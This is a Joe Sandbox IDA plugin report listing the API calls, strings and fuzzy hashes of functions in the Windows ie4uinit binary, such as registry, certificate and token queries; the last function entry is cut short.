Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: d3145d69244c4f85f159bb4c11e411ed65052b5f760adfb04ab078cf95d46dc5
Instruction ID: a3b543b26a5dc24345b546e584190bbe1e8a2bad80b8ea79603922197b726f40
Opcode Fuzzy Hash: d3145d69244c4f85f159bb4c11e411ed65052b5f760adfb04ab078cf95d46dc5
Instruction Fuzzy Hash: 01219335A0DB4285E7249F69EE400A9B7A1EB84F90F184138DF8D87B69DF7CE8458B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521E9CC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00007FF6B521EAB2
SysFreeString.OLEAUT32 ref: 00007FF6B521EAFC
SysFreeString.OLEAUT32 ref: 00007FF6B521EB1D
SysFreeString.OLEAUT32 ref: 00007FF6B521EB44
SysStringLen.OLEAUT32 ref: 00007FF6B521EB6A
SysFreeString.OLEAUT32 ref: 00007FF6B521EC4C

Strings

/%s/, xrefs: 00007FF6B521EADB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free
String ID: /%s/
API String ID: 1391021980-1213264659
Opcode ID: 72edbbe58e1da21402a24343c84eb4073f674baba544b0a95578b6a67ba4fd95
Instruction ID: f8eed1fce3ba89b0a534cf821f3c4f8067528486db9955cbe804f1502f9d4970
Opcode Fuzzy Hash: 72edbbe58e1da21402a24343c84eb4073f674baba544b0a95578b6a67ba4fd95
Instruction Fuzzy Hash: 0E715622B19A9685EB508B19DE805EA6B60FF88F80F104031EB4ED765EDF3EED458740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522B9DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF6B522BA1B
LCMapStringW.KERNEL32 ref: 00007FF6B522BA56
GetLastError.KERNEL32 ref: 00007FF6B522BB14
GetLastError.KERNEL32 ref: 00007FF6B522BB28
GetLastError.KERNEL32 ref: 00007FF6B522BB37

Strings

\, xrefs: 00007FF6B522BABA
%X_, xrefs: 00007FF6B522BAD4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FullNamePathString
String ID: %X_$\
API String ID: 1618852869-896525776
Opcode ID: 74d6827304ed034feffc8a136a1df8067581cfb9b97dfd9d7dcd6606c0e958a1
Instruction ID: bcd0df14142d6a6e9dfd53de72cad08795a3644aee0ad4d72f0ec695fc0dace7
Opcode Fuzzy Hash: 74d6827304ed034feffc8a136a1df8067581cfb9b97dfd9d7dcd6606c0e958a1
Instruction Fuzzy Hash: 8241F629B1A64686FB208B29AA547F67290FF84F44F404139DF4DC7A9EDE3DE8418700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522780C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 110encryptionCOMMON

Download Yara Rule

APIs

CertGetIntendedKeyUsage.CRYPT32 ref: 00007FF6B5227842
CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF6B5227871

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF6B5227899
StrCmpNA.SHLWAPI ref: 00007FF6B52278D1
StrCmpNW.SHLWAPI(?,?,00000000,00000000,?,00007FF6B5227A0D), ref: 00007FF6B522793D

Strings

1.3.6.1.4.1.311.13.1, xrefs: 00007FF6B52278CA
IE Enhanced User Preference Protection, xrefs: 00007FF6B5227933

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CertUsage$Enhanced$HeapIntendedProcess
String ID: 1.3.6.1.4.1.311.13.1$IE Enhanced User Preference Protection
API String ID: 3357760039-1085473373
Opcode ID: f2ee5f483f1c7b7f23e33116ad6f2625a3009ae2ad16315e6239151e5e042d0c
Instruction ID: 68110e7ef074dace926f770083d37529a6cbd9ecba0d62617c9b65d6349e24fa
Opcode Fuzzy Hash: f2ee5f483f1c7b7f23e33116ad6f2625a3009ae2ad16315e6239151e5e042d0c
Instruction Fuzzy Hash: 61419029F1E75682E6209B2ADE801B96795AB44F90F484134DF4D8379EDF7EFC42CA01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5213738 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 00007FF6B521378E
RegOpenKeyExW.ADVAPI32 ref: 00007FF6B52137A6
StrCmpIW.SHLWAPI ref: 00007FF6B5213812
RegSetValueW.ADVAPI32 ref: 00007FF6B5213835
RegCloseKey.ADVAPI32 ref: 00007FF6B5213840

Strings

IEXPLORE.EXE, xrefs: 00007FF6B52137EF, 00007FF6B521380B
Software\Clients\StartMenuInternet, xrefs: 00007FF6B5213756

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseCreateOpenValue
String ID: IEXPLORE.EXE$Software\Clients\StartMenuInternet
API String ID: 776291540-1175255948
Opcode ID: 4d36491de34716d6121cd43e8542a88f00773e016fac8a8a7f43ff24cd0bac07
Instruction ID: 86b3c799435d8fa8edc5638f9c0be556f342cb28b6c6adf343cf0d04a2034b47
Opcode Fuzzy Hash: 4d36491de34716d6121cd43e8542a88f00773e016fac8a8a7f43ff24cd0bac07
Instruction Fuzzy Hash: BC31527290DB8286EB708B14FA447A7B3A5FB94B54F400135D78D82A59DF7DD949CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5230E48 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5230E86
RegQueryValueExW.ADVAPI32 ref: 00007FF6B5230EC1
RegQueryValueExW.ADVAPI32 ref: 00007FF6B5230EFA
RegCloseKey.ADVAPI32 ref: 00007FF6B5230F12

Strings

SYSTEM\Setup, xrefs: 00007FF6B5230E75
OOBEInProgress, xrefs: 00007FF6B5230EDD
SystemSetupInProgress, xrefs: 00007FF6B5230EA1

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: OOBEInProgress$SYSTEM\Setup$SystemSetupInProgress
API String ID: 1586453840-252206877
Opcode ID: 7d39892a5ec5724f0d6d85e7185d53eafd03025e0b408bae42bd87cb0366bb54
Instruction ID: ab384ec175d3b273038f266b53aa7eaa198378b1cc24d1ab111a5eb35f4404b6
Opcode Fuzzy Hash: 7d39892a5ec5724f0d6d85e7185d53eafd03025e0b408bae42bd87cb0366bb54
Instruction Fuzzy Hash: 49211E36A05A428EEB708F28ED40AE93364FB54B9CF451235EB4D43A59DF3CE985C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52243CC Relevance: 12.2, APIs: 8, Instructions: 197memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B522A93C: LocalAlloc.KERNEL32(?,?,00000000,00007FF6B52236D0,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522A961
Part of subcall function 00007FF6B522A93C: LocalFree.KERNEL32(?,?,00000000,00007FF6B52236D0,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522A97C

#682.IERTUTIL(?,?,?,?,00000000,00000001,?,00007FF6B52236FD,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522445F
#665.IERTUTIL(?,?,?,?,00000000,00000001,?,00007FF6B52236FD,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B52244C8
#665.IERTUTIL(?,?,?,?,00000000,00000001,?,00007FF6B52236FD,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B52244E1
#651.IERTUTIL ref: 00007FF6B5224564
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF6B52236FD,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B5224636
HeapFree.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF6B52236FD,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B5224644
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF6B52236FD,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522465C
HeapFree.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF6B52236FD,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522466A

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$Free$#665LocalProcess$#651#682Alloc
String ID:
API String ID: 2616862846-0
Opcode ID: b17b185ef6ae81f409477f6b85c21ffa21aeede9a027e6ebff3cdfb2fc843f9d
Instruction ID: b04481d2df0178c631e404eaa0359202b2fe10a17b8c7b3081662338a393bf59
Opcode Fuzzy Hash: b17b185ef6ae81f409477f6b85c21ffa21aeede9a027e6ebff3cdfb2fc843f9d
Instruction Fuzzy Hash: 0F81A835A1969286EB149F5AAE401BAB7A5FB84FC4F044035EF4D87B5ECF7DE8018B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521A170 Relevance: 12.1, APIs: 8, Instructions: 91COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6B521A1BD
OpenProcessToken.ADVAPI32 ref: 00007FF6B521A1D0
GetNamedSecurityInfoW.ADVAPI32 ref: 00007FF6B521A21A
LocalFree.KERNEL32 ref: 00007FF6B521A297

Part of subcall function 00007FF6B521A040: #57.IERTUTIL(00007FF6B521A530), ref: 00007FF6B521A068
Part of subcall function 00007FF6B521A040: GetLengthSid.ADVAPI32 ref: 00007FF6B521A07B
Part of subcall function 00007FF6B521A040: LocalAlloc.KERNEL32 ref: 00007FF6B521A0B0
Part of subcall function 00007FF6B521A040: memset.MSVCRT ref: 00007FF6B521A0C6
Part of subcall function 00007FF6B521A040: memcpy_s.MSVCRT ref: 00007FF6B521A0D8
Part of subcall function 00007FF6B521A040: AddAccessAllowedAceEx.ADVAPI32 ref: 00007FF6B521A0FC
Part of subcall function 00007FF6B521A040: LocalFree.KERNEL32 ref: 00007FF6B521A124
Part of subcall function 00007FF6B521A040: LocalFree.KERNEL32 ref: 00007FF6B521A13D

SetNamedSecurityInfoW.ADVAPI32 ref: 00007FF6B521A26A
LocalFree.KERNEL32 ref: 00007FF6B521A285
CloseHandle.KERNEL32 ref: 00007FF6B521A2B2
GetLastError.KERNEL32 ref: 00007FF6B521A2BA

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Local$Free$InfoNamedProcessSecurity$AccessAllocAllowedCloseCurrentErrorHandleLastLengthOpenTokenmemcpy_smemset
String ID:
API String ID: 347426353-0
Opcode ID: 3715311143da3f0ee7dcf3f3fc2ccf400d29d1a487cd90e5b283e34a910a7dfd
Instruction ID: 2b9a34bb9b2fc673311e4a5b7ab8f92b6ef0ad61feb184522868620074646154
Opcode Fuzzy Hash: 3715311143da3f0ee7dcf3f3fc2ccf400d29d1a487cd90e5b283e34a910a7dfd
Instruction Fuzzy Hash: 5441C432619B4286F760CB65EA803EA73E4FB88B84F400131DB8DC6959DF7DE848C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522F7CC Relevance: 12.1, APIs: 8, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32 ref: 00007FF6B522F7FC
CertGetCertificateContextProperty.CRYPT32 ref: 00007FF6B522F821
GetLastError.KERNEL32 ref: 00007FF6B522F830
GetLastError.KERNEL32 ref: 00007FF6B522F844
GetLastError.KERNEL32 ref: 00007FF6B522F878
GetLastError.KERNEL32 ref: 00007FF6B522F88C

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CertCertificateContextProperty$HeapProcess
String ID:
API String ID: 1250319754-0
Opcode ID: 2439d672701580d8fa277a9f1c8205b584c5dd442eff81ca5e730ec79d6f2e66
Instruction ID: 5ad4bcb42aecd901b75ffdcc853bfea6b33c2cb7594283d648e50522dfd918a9
Opcode Fuzzy Hash: 2439d672701580d8fa277a9f1c8205b584c5dd442eff81ca5e730ec79d6f2e66
Instruction Fuzzy Hash: E521A765B1AB868AF7105F6A9E817B9B298AF44F80F184134CB0DC775ADE3DFC419211

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214AB8 Relevance: 10.6, APIs: 7, Instructions: 140registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00007FF6B5214B17
RegEnumKeyExW.ADVAPI32 ref: 00007FF6B5214B91
RegOpenKeyExW.ADVAPI32 ref: 00007FF6B5214BB8

Part of subcall function 00007FF6B5214AB8: RegCloseKey.ADVAPI32 ref: 00007FF6B5214BD7

RegEnumValueW.ADVAPI32 ref: 00007FF6B5214C59
_wcsnicmp.MSVCRT ref: 00007FF6B5214C79
RegDeleteValueW.ADVAPI32 ref: 00007FF6B5214C89

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: EnumValue$CloseDeleteHeapInfoOpenProcessQuery_wcsnicmp
String ID:
API String ID: 3392893151-0
Opcode ID: a06eb7b2b7144f3cf6f192f9581c61d55fcc7beac6f79bd178f180a9707cba66
Instruction ID: 4c83663f5c8fefc3ef6999c9335c6c67eee7c20dda3c91f1ca3bb94a5b9cf8bf
Opcode Fuzzy Hash: a06eb7b2b7144f3cf6f192f9581c61d55fcc7beac6f79bd178f180a9707cba66
Instruction Fuzzy Hash: E1518E32B097618AEB50DF65DA843FE33A4BB44B98F000239DB1D86B89DF39D945C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521709C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF6B52170F4
wcschr.MSVCRT ref: 00007FF6B521710B

Strings

Software\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF6B52170AE
\\?\, xrefs: 00007FF6B5217186

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: wcschr
String ID: Software\Microsoft\Windows\CurrentVersion\Policies$\\?\
API String ID: 1497570035-1297041245
Opcode ID: 0fcb7489d3135d57d878f35b73a8cb52936170dab344db62fd25c72e9128af6f
Instruction ID: e9d3b163adc15eb1640b4ab40bca5fcd29c5bc20b5958574e7bdbb089e9e01cc
Opcode Fuzzy Hash: 0fcb7489d3135d57d878f35b73a8cb52936170dab344db62fd25c72e9128af6f
Instruction Fuzzy Hash: 12315322F4661581EA249B19DE001BA62B4EF94FA0B594531CB2F832D9EFBDEC419340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B523134C Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231370
HeapAlloc.KERNEL32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B523138A
GetTokenInformation.ADVAPI32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52313AB
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52313BA
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52313CE
HeapFree.KERNEL32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52313F9

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFreeInformationToken
String ID:
API String ID: 1666231400-0
Opcode ID: 70ac26f172b2e42c89a6b87ea1eb1fd6b4899665035df3632c5d5b7e08289252
Instruction ID: 6b3d42a9015f06ce911c754dc5e0dbce3e50b892a9430c28d474eef8516a7f12
Opcode Fuzzy Hash: 70ac26f172b2e42c89a6b87ea1eb1fd6b4899665035df3632c5d5b7e08289252
Instruction Fuzzy Hash: A1218321B0AB528DE7249B2BAF8466972D4BF48F90F184434DF4DC765AEE7CEC428340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5231258 Relevance: 10.6, APIs: 7, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B52311BC: GetCurrentThread.KERNEL32 ref: 00007FF6B52311CD
Part of subcall function 00007FF6B52311BC: OpenThreadToken.ADVAPI32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52311E0
Part of subcall function 00007FF6B52311BC: GetLastError.KERNEL32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52311EA
Part of subcall function 00007FF6B52311BC: GetCurrentProcess.KERNEL32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231210
Part of subcall function 00007FF6B52311BC: OpenProcessToken.ADVAPI32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231221

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231280
GetTokenInformation.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52312A0
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B5231301
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B523130F
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231323
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231331
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B523133C

Part of subcall function 00007FF6B523134C: GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231370
Part of subcall function 00007FF6B523134C: HeapAlloc.KERNEL32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B523138A
Part of subcall function 00007FF6B523134C: GetTokenInformation.ADVAPI32(?,?,?,?,00000000,00007FF6B52312BF,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52313AB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: HeapProcessToken$ErrorLast$CurrentInformationOpenThread$AllocCloseConvertFreeHandleString
String ID:
API String ID: 1022525647-0
Opcode ID: 40c312d31ae8cbdccd5b1a64614ce69df1b073e18582d0e980ddb5b19a40b1a1
Instruction ID: 55e5e70a86ddf03fc792f52f8234772749aed4f6499ec3ae60d5283f4ebdeb6e
Opcode Fuzzy Hash: 40c312d31ae8cbdccd5b1a64614ce69df1b073e18582d0e980ddb5b19a40b1a1
Instruction Fuzzy Hash: 21215E31F0A7528AE7249B69EF842F96395AF48F90F404531DF4DC6A5AEF3CE8468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5230670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B52190F4: LocalFree.KERNEL32 ref: 00007FF6B5219312

